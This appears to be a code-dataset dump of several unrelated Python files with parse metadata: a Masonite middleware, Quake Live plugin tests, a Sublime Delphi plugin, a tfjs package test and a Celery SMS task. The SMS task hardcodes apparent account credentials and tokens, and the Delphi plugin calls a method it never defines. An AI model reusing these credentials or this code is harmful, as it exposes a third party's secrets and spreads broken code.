env.close()
[((282, 10, 282, 41), 'gym.make', 'gym.make', ({(282, 19, 282, 40): '"""RoboschoolHopper-v1"""'}, {}), "('RoboschoolHopper-v1')", False, 'import gym, roboschool\n'), ((290, 4, 290, 38), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((73, 18, 73, 38), 'numpy.array', 'np.array', ({(73, 27, 73, 37): 'fromto[:3]'}, {}), '(fromto[:3])', True, 'import numpy as np\n'), ((74, 18, 74, 38), 'numpy.array', 'np.array', ({(74, 27, 74, 37): 'fromto[3:]'}, {}), '(fromto[3:])', True, 'import numpy as np\n'), ((219, 20, 219, 44), 'xml.etree.ElementTree.parse', 'ET.parse', ({(219, 29, 219, 43): 'self.model_xml'}, {}), '(self.model_xml)', True, 'import xml.etree.ElementTree as ET\n'), ((75, 25, 75, 57), 'numpy.sum', 'np.sum', ({(75, 32, 75, 56): '(self.p2 - self.p1) ** 2'}, {}), '((self.p2 - self.p1) ** 2)', True, 'import numpy as np\n'), ((299, 57, 299, 89), 'os.path.join', 'os.path.join', ({(299, 70, 299, 76): 'outdir', (299, 78, 299, 88): '"""%05d.png"""'}, {}), "(outdir, '%05d.png')", False, 'import os\n'), ((299, 136, 299, 167), 'os.path.join', 'os.path.join', ({(299, 149, 299, 155): 'outdir', (299, 157, 299, 166): '"""out.mp4"""'}, {}), "(outdir, 'out.mp4')", False, 'import os\n'), ((210, 41, 210, 59), 'numpy.array', 'np.array', ({(210, 50, 210, 58): '(v1, v2)'}, {}), '((v1, v2))', True, 'import numpy as np\n'), ((86, 57, 86, 91), 'numpy.concatenate', 'np.concatenate', ({(86, 72, 86, 90): '[self.p1, self.p2]'}, {}), '([self.p1, self.p2])', True, 'import numpy as np\n')]
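As a quick illustration of the geometry wrappers in xml_parser.py above, a small standalone snippet (assuming the Sphere class from that file is importable; not part of the repository itself) showing how a sphere geom element is rescaled in place:

import xml.etree.ElementTree as ET

geom_xml = ET.fromstring('<geom type="sphere" size="0.2" pos="0 0 1.0"/>')
sphere = Sphere(geom_xml)            # wraps the element; params == [0.2] (radius)
sphere.update([0.3])                 # rescale and write the new radius back into the XML
print(ET.tostring(geom_xml))         # size attribute is now "0.3"
print(sphere.get_smallest_z())       # 1.0 - 0.3 = 0.7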
josephmancuso/masonite-forum
app/http/middleware/LoadUserMiddleware.py
a91c7386f3e0b02b0ac71623eb295a7543cb60fd
''' Load User Middleware''' from masonite.facades.Auth import Auth class LoadUserMiddleware: ''' Middleware class which loads the current user into the request ''' def __init__(self, Request): ''' Inject Any Dependencies From The Service Container ''' self.request = Request def before(self): ''' Run This Middleware Before The Route Executes ''' self.load_user(self.request) return self.request def after(self): ''' Run This Middleware After The Route Executes ''' pass def load_user(self, request): ''' Load user into the request ''' request.set_user(Auth(request).user())
[((22, 25, 22, 38), 'masonite.facades.Auth.Auth', 'Auth', ({(22, 30, 22, 37): 'request'}, {}), '(request)', False, 'from masonite.facades.Auth import Auth\n')]
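Middleware like LoadUserMiddleware above only takes effect once it is registered in the project's middleware configuration. The sketch below is a hedged illustration: the config/middleware.py location and the HTTP_MIDDLEWARE variable name are assumptions based on typical Masonite projects of this generation, not taken from this repository.

# config/middleware.py (assumed file and variable name)
from app.http.middleware.LoadUserMiddleware import LoadUserMiddleware

HTTP_MIDDLEWARE = [
    LoadUserMiddleware,   # runs before and after every request, attaching the current user
]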
mgaertne/minqlx-plugin-tests
src/unittest/python/merciful_elo_limit_tests.py
10a827fe063c86481560dcc00a8a3ce2ba60861b
from minqlx_plugin_test import * import logging import unittest from mockito import * from mockito.matchers import * from hamcrest import * from redis import Redis from merciful_elo_limit import * class MercifulEloLimitTests(unittest.TestCase): def setUp(self): setup_plugin() setup_cvars({ "qlx_mercifulelo_minelo": "800", "qlx_mercifulelo_applicationgames": "10", "qlx_mercifulelo_abovegames": "10", "qlx_mercifulelo_daysbanned": "30", "qlx_owner": "42" }) setup_game_in_progress() self.plugin = merciful_elo_limit() self.reply_channel = mocked_channel() self.plugin.database = Redis self.db = mock(Redis) self.plugin._db_instance = self.db when(self.db).__getitem__(any).thenReturn("42") def tearDown(self): unstub() def setup_balance_ratings(self, player_elos): gametype = None if len(player_elos) > 0: gametype = self.plugin.game.type_short ratings = {} for player, elo in player_elos: ratings[player.steam_id] = {gametype: {'elo': elo}} self.plugin._loaded_plugins["balance"] = mock({'ratings': ratings}) def setup_no_balance_plugin(self): if "balance" in self.plugin._loaded_plugins: del self.plugin._loaded_plugins["balance"] def setup_exception_list(self, players): mybalance_plugin = mock(Plugin) mybalance_plugin.exceptions = [player.steam_id for player in players] self.plugin._loaded_plugins["mybalance"] = mybalance_plugin def test_handle_map_change_resets_tracked_player_ids(self): connected_players() self.setup_balance_ratings([]) self.plugin.tracked_player_sids = [123, 455] self.plugin.handle_map_change("campgrounds", "ca") assert_that(self.plugin.tracked_player_sids, is_([])) def test_handle_map_change_resets_announced_player_ids(self): connected_players() self.setup_balance_ratings([]) self.plugin.announced_player_elos = [123, 455] self.plugin.handle_map_change("campgrounds", "ca") assert_that(self.plugin.announced_player_elos, is_([])) def test_handle_map_change_fetches_elos_of_connected_players(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 1200)}) self.plugin.handle_map_change("thunderstruck", "ca") verify(self.plugin._loaded_plugins["balance"]).add_request( {player1.steam_id: 'ca', player2.steam_id: 'ca'}, self.plugin.callback_ratings, CHAT_CHANNEL ) def test_handle_player_connect_fetches_elo_of_connecting_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connecting_player = fake_player(789, "Connecting Player") connected_players(player1, player2, connecting_player) self.setup_balance_ratings({(player1, 900), (player2, 1200), (connecting_player, 1542)}) self.plugin.handle_player_connect(connecting_player) verify(self.plugin._loaded_plugins["balance"]).add_request( {connecting_player.steam_id: 'ca'}, self.plugin.callback_ratings, CHAT_CHANNEL ) def test_fetch_elos_of_players_with_no_game_setup(self): setup_no_game() self.setup_balance_ratings({}) self.plugin.fetch_elos_of_players([]) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_fetch_elos_of_players_with_unsupported_gametype(self): setup_game_in_progress("unsupported") self.setup_balance_ratings({}) self.plugin.fetch_elos_of_players([]) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_fetch_elos_of_player_with_no_balance_plugin(self): mocked_logger = mock(spec=logging.Logger) spy2(minqlx.get_logger) 
when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger) self.setup_no_balance_plugin() self.plugin.fetch_elos_of_players([]) verify(mocked_logger).warning(matches("Balance plugin not found.*")) def test_handle_round_countdown_with_no_game(self): setup_no_game() player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({}) self.plugin.handle_round_countdown(1) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_handle_round_countdown_fetches_elos_of_players_in_teams(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({(player1, 900), (player2, 1200), (player3, 1600)}) self.plugin.handle_round_countdown(4) verify(self.plugin._loaded_plugins["balance"]).add_request( {player1.steam_id: 'ca', player2.steam_id: 'ca'}, self.plugin.callback_ratings, CHAT_CHANNEL ) def test_callback_ratings_with_no_game_running(self): setup_no_game() player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({}) self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL) verify(self.db, times=0).get(any) def test_callback_ratings_with_unsupported_game_type(self): setup_game_in_progress("unsupported") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({}) self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL) verify(self.db, times=0).get(any) def test_callback_ratings_warns_low_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*")) verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*")) def test_callback_ratings_announces_information_to_other_players(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) assert_plugin_sent_to_console(matches("Fake Player2.*is below.*, but has.*8.*application matches left.*")) def test_callback_ratings_announces_information_to_other_players_just_once_per_connect(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") 
connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) self.plugin.announced_player_elos = [456] patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) assert_plugin_sent_to_console(matches("Player.*is below.*, but has 8 application matches left.*"), times=0) def test_callback_ratings_makes_exception_for_player_in_exception_list(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="red") connected_players(player1, player2, player3) self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)}) self.setup_exception_list([player3]) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2, player3], minqlx.CHAT_CHANNEL) verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*")) verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*")) verify(player3, times=0).center_print(any) verify(player3, times=0).tell(any) def test_callback_ratings_warns_low_elo_player_when_application_games_not_set(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn(None) self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) verify(player2, times=12).center_print(matches(".*Skill warning.*10.*matches left.*")) verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*10.*of 10 application matches.*")) def test_callback_ratings_bans_low_elo_players_that_used_up_their_application_games(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("11") spy2(minqlx.COMMANDS.handle_input) when2(minqlx.COMMANDS.handle_input, any, any, any).thenReturn(None) patch(minqlx.PlayerInfo, lambda *args: mock(spec=minqlx.PlayerInfo)) patch(minqlx.next_frame, lambda func: func) when(self.db).delete(any).thenReturn(None) self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) verify(minqlx.COMMANDS).handle_input(any, any, any) verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) def test_handle_round_start_increases_application_games_for_untracked_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) 
verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) def test_handle_round_start_makes_exception_for_player_in_exception_list(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="red") connected_players(player1, player2, player3) self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)}) self.setup_exception_list([player3]) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) verify(self.db, times=0).incr("minqlx:players:{}:minelo:freegames".format(player3.steam_id)) def test_handle_round_start_starts_tracking_for_low_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id)) def test_handle_round_start_resets_above_games_for_low_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_increases_above_games_for_application_games_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("3") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_increases_above_games_for_application_games_player_with_no_aobve_games_set(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("1") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_starts_tracking_of_above_elo_players_for_application_games_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("3") 
when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id)) def test_handle_round_start_removes_minelo_db_entries_for_above_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 801)}) when(self.db).get(any).thenReturn("11") when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(True) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id)) verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id)) def test_handle_round_start_skips_already_tracked_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.plugin.tracked_player_sids.append(player2.steam_id) self.setup_balance_ratings({(player1, 900), (player2, 799)}) when(self.db).get(any).thenReturn(3) when(self.db).delete(any).thenReturn(None) when(self.db).exists(any).thenReturn(False) when(self.db).incr(any).thenReturn(None) self.plugin.handle_round_start(1) verify(self.db, times=0).delete(any) verify(self.db, times=0).delete(any) def test_handle_round_start_with_unsupported_gametype(self): setup_game_in_progress("unsupported") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({}) self.plugin.handle_round_start(2) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_handle_round_start_with_no_balance_plugin(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) mocked_logger = mock(spec=logging.Logger) spy2(minqlx.get_logger) when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger) self.setup_no_balance_plugin() self.plugin.handle_round_start(5) verify(mocked_logger, atleast=1).warning(matches("Balance plugin not found.*")) def test_cmd_mercis_shows_currently_connected_merciful_players(self): player = fake_player(666, "Cmd using Player") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="blue") connected_players(player, player1, player2, player3) self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)}) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3") when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None) self.plugin.cmd_mercis(player, ["!mercis"], self.reply_channel) assert_channel_was_replied(self.reply_channel, matches("Fake Player1 \(elo: 801\):.*8.*application matches " "left,.*6.*matches above.*")) assert_channel_was_replied(self.reply_channel, matches("Fake 
Player2 \(elo: 799\):.*7.*application matches " "left")) def test_cmd_mercis_replies_to_main_cbannel_instead_of_team_chat(self): self.addCleanup(self.reset_chat_channel, minqlx.CHAT_CHANNEL) minqlx.CHAT_CHANNEL = mocked_channel() player = fake_player(666, "Cmd using Player") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="blue") connected_players(player, player1, player2, player3) self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)}) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3") when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6") when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None) when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None) self.plugin.cmd_mercis(player, ["!mercis"], minqlx.BLUE_TEAM_CHAT_CHANNEL) assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player1 \(elo: 801\):.*8.*application matches " "left,.*6.*matches above.*")) assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player2 \(elo: 799\):.*7.*application matches " "left")) def reset_chat_channel(self, original_chat_channel): minqlx.CHAT_CHANNEL = original_chat_channel def test_cmd_mercis_shows_no_mercis_if_no_player_using_their_application_matches(self): player = fake_player(666, "Cmd using Player") connected_players(player) self.setup_balance_ratings({(player, 1400)}) when(self.db).get(any).thenReturn(None) self.plugin.cmd_mercis(player, ["!mercis"], minqlx.CHAT_CHANNEL) assert_plugin_sent_to_console(any, times=0)
[]
Vent-Any/meiduo_mall_cangku
meiduo_mall/celery_tasks/sms/tasks.py
5b3b7f029be267cb5d2d3666f99be166d27213f1
from ronglian_sms_sdk import SmsSDK from celery_tasks.main import app # Define our task (function) # A task must be decorated with the Celery instance's task decorator # Tasks in the task package need Celery's self-check/autodiscover call. (Written in main.) @app.task def celery_send_sms_code(mobile, sms_code): accId = '8a216da8762cb4570176c60593ba35ec' accToken = '514a8783b8c2481ebbeb6a814434796f' appId = '8a216da8762cb4570176c605948c35f2' # 9.1. Create the RongLian Cloud SDK instance sdk = SmsSDK(accId, accToken, appId) tid = '1' # Our SMS template; the value can only be 1 because we are a test user mobile = '%s' % mobile # 'phone number 1,phone number 2': which numbers receive the code; test numbers only datas = (sms_code, 10) # ('variable 1', 'variable 2'): the variables used by the template # Your verification code is {1}, please enter it within {2} minutes # Your verification code is 666999, please enter it within 5 minutes # 9.2. Send the SMS sdk.sendMessage(tid, mobile, datas)
[((14, 10, 14, 40), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', ({(14, 17, 14, 22): 'accId', (14, 24, 14, 32): 'accToken', (14, 34, 14, 39): 'appId'}, {}), '(accId, accToken, appId)', False, 'from ronglian_sms_sdk import SmsSDK\n')]
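A short usage sketch for the task above (an assumed call site, not part of the catalogued file): queuing it with Celery's standard .delay() keeps SMS sending off the request thread.

from celery_tasks.sms.tasks import celery_send_sms_code

# example values; in the real project the code would come from the verify-code view
celery_send_sms_code.delay('13800000000', '123456')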
JeisonJHA/Plugins-Development
delphiIDE.py
cccb58908eed6114c569e53d5710e70b8d53f5c5
import sublime_plugin class MethodDeclaration(object): """docstring for MethodDeclaration""" def __init__(self): self._methodclass = None self.has_implementation = False self.has_interface = False @property def has_implementation(self): return self._has_implementation @has_implementation.setter def has_implementation(self, value): self._has_implementation = value @property def has_interface(self): return self._has_interface @has_interface.setter def has_interface(self, value): self._has_interface = value @property def methodname(self): return self._methodname @methodname.setter def methodname(self, value): self._methodname = value @property def methodregion(self): return self._methodregion @methodregion.setter def methodregion(self, value): self._methodregion = value @property def visibility(self): return self._visibility @visibility.setter def visibility(self, value): self._visibility = value @property def params(self): return self._params @params.setter def params(self, value): self._params = value @property def methodclass(self): return self._methodclass @methodclass.setter def methodclass(self, value): self._methodclass = value class ClassDeclaration(object): """docstring for ClassDeclaration""" @property def classname(self): return self._classname @classname.setter def classname(self, value): self._classname = value @property def classregion(self): return self._classregion @classregion.setter def classregion(self, value): self._classregion = value @property def privateregion(self): return self._privateregion @privateregion.setter def privateregion(self, value): self._privateregion = value @property def protectedregion(self): return self._protectedregion @protectedregion.setter def protectedregion(self, value): self._protectedregion = value @property def publicregion(self): return self._publicregion @publicregion.setter def publicregion(self, value): self._publicregion = value @property def publishedregion(self): return self._publishedregion @publishedregion.setter def publishedregion(self, value): self._publishedregion = value class DelphiIdeCommand(sublime_plugin.TextCommand): # // { "keys": ["ctrl+shift+x"], "command": "delphi_ide", "args": {"teste": "delphimethodnav"}} # view.window().run_command('show_panel', # args={"panel": 'output.find_results', "toggle": True}) def run(self, edit, teste): print('teste[0]:%s' % teste) method = None try: method = getattr(self, teste) except AttributeError: raise NotImplementedError("Class `{}` does not implement `{}`". 
format(self.__class__.__name__, teste)) method() def delphimethodnav(self): print('vai doido') def getMethodInformation(self): view = self.view cursor_region = view.sel()[0] cursor_pt = view.sel()[0].begin() if not view.match_selector(cursor_pt, 'function.implementation.delphi'): # exit because it is not in a method return None def params(region): params_region = view.find_by_selector( 'meta.function.parameters.delphi') param_name_region = view.find_by_selector( 'variable.parameter.function.delphi') params_region_filt = [ s for s in params_region if region.contains(s)] params_region_filt = [ s for s in param_name_region if params_region_filt[0].contains(s)] return params_region_filt def paramsFromRegion(region): try: params_region_filt = params(region) x = [view.substr(x) for x in params_region_filt] return x except: return [] def getFunctionName(): functionname = view.find_by_selector('entity.name.function') functionnamefiltered = [ n for n in functionname if method.methodregion[0].contains(n)] return view.substr(functionnamefiltered[0]) # has_implementation # has_interface # methodname # methodregion # visibility # params # methodclass method = MethodDeclaration() selector = view.find_by_selector method.methodregion = [r for r in selector('meta.function.delphi') if cursor_region.intersects(r)] method.methodname = getFunctionName() method.params = self.paramsFromRegion(method.methodregion[0]) return method def getClassInformation(self): pass
[]
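The plugin above dispatches on the teste argument via getattr, so besides the keybinding shown in its comment it can be exercised from the Sublime Text console (Sublime derives the command name delphi_ide from the DelphiIdeCommand class; view is the console's current-view object):

view.run_command("delphi_ide", {"teste": "delphimethodnav"})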
syt123450/tfjs-converter
python/test_pip_package.py
a90fa59a44d9425beb7b1584fe753c62d62bbc4d
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Test the Python API and shell binary of the tensorflowjs pip package.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import glob import json import os import shutil import subprocess import sys import tempfile import unittest import numpy as np import tensorflow as tf from tensorflow import keras from tensorflow.python.eager import def_function from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import tensor_spec from tensorflow.python.ops import variables from tensorflow.python.training.tracking import tracking from tensorflow.python.saved_model.save import save import tensorflow_hub as hub import tensorflowjs as tfjs def _createKerasModel(layer_name_prefix, h5_path=None): """Create a Keras model for testing. Args: layer_name_prefix: A prefix string for layer names. This helps avoid clashes in layer names between different test methods. h5_path: Optional string path for a HDF5 (.h5) file to save the model in. Returns: An instance of keras.Model. """ input_tensor = keras.layers.Input((3, )) dense1 = keras.layers.Dense( 4, use_bias=True, kernel_initializer='ones', bias_initializer='zeros', name=layer_name_prefix + '1')(input_tensor) output = keras.layers.Dense( 2, use_bias=False, kernel_initializer='ones', name=layer_name_prefix + '2')(dense1) model = keras.models.Model(inputs=[input_tensor], outputs=[output]) if h5_path: model.save(h5_path) return model def _createTensorFlowSavedModelV1(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. """ graph = tf.Graph() with graph.as_default(): with tf.compat.v1.name_scope(name_scope): x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]]) w = tf.compat.v1.get_variable('w', shape=[2, 2]) y = tf.compat.v1.matmul(x, w) output = tf.compat.v1.nn.softmax(y) init_op = w.initializer # Create a builder. builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path) with tf.compat.v1.Session() as sess: # Run the initializer on `w`. sess.run(init_op) builder.add_meta_graph_and_variables( sess, [tf.compat.v1.saved_model.tag_constants.SERVING], signature_def_map={ "serving_default": tf.compat.v1.saved_model.signature_def_utils.predict_signature_def( inputs={"x": x}, outputs={"output": output}) }, assets_collection=None) builder.save() def _createTensorFlowSavedModel(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. 
""" input_data = constant_op.constant(1., shape=[1]) root = tracking.AutoTrackable() root.v1 = variables.Variable(3.) root.v2 = variables.Variable(2.) root.f = def_function.function(lambda x: root.v1 * root.v2 * x) to_save = root.f.get_concrete_function(input_data) save(root, save_path, to_save) def _create_hub_module(save_path): """Create a TensorFlow Hub module for testing. Args: save_path: The directory path in which to save the model. """ # Module function that doubles its input. def double_module_fn(): w = tf.Variable([2.0, 4.0]) x = tf.compat.v1.placeholder(dtype=tf.float32) hub.add_signature(inputs=x, outputs=x*w) graph = tf.Graph() with graph.as_default(): spec = hub.create_module_spec(double_module_fn) m = hub.Module(spec) # Export the module. with tf.compat.v1.Session(graph=graph) as sess: sess.run(tf.compat.v1.global_variables_initializer()) m.export(save_path, sess) class APIAndShellTest(tf.test.TestCase): """Tests for the Python API of the pip package.""" @classmethod def setUpClass(cls): cls.class_tmp_dir = tempfile.mkdtemp() cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model') cls.tf_saved_model_v1_dir = os.path.join( cls.class_tmp_dir, 'tf_saved_model_v1') _createTensorFlowSavedModel('a', cls.tf_saved_model_dir) _createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir) cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module') _create_hub_module(cls.tf_hub_module_dir) @classmethod def tearDownClass(cls): shutil.rmtree(cls.class_tmp_dir) def setUp(self): # Make sure this file is not being run from the source directory, to # avoid picking up source files. if os.path.isdir( os.path.join(os.path.dirname(__file__), 'tensorflowjs')): self.fail('Do not run this test from the Python source directory. ' 'This file is intended to be run on pip install.') self._tmp_dir = tempfile.mkdtemp() super(APIAndShellTest, self).setUp() def tearDown(self): if os.path.isdir(self._tmp_dir): shutil.rmtree(self._tmp_dir) super(APIAndShellTest, self).tearDown() def testVersionString(self): self.assertEqual(2, tfjs.__version__.count('.')) def testSaveKerasModel(self): with self.test_session(): # First create a toy keras model. model = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model, self._tmp_dir) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json')) as f: json_content = json.load(f) model_json = json_content['modelTopology'] 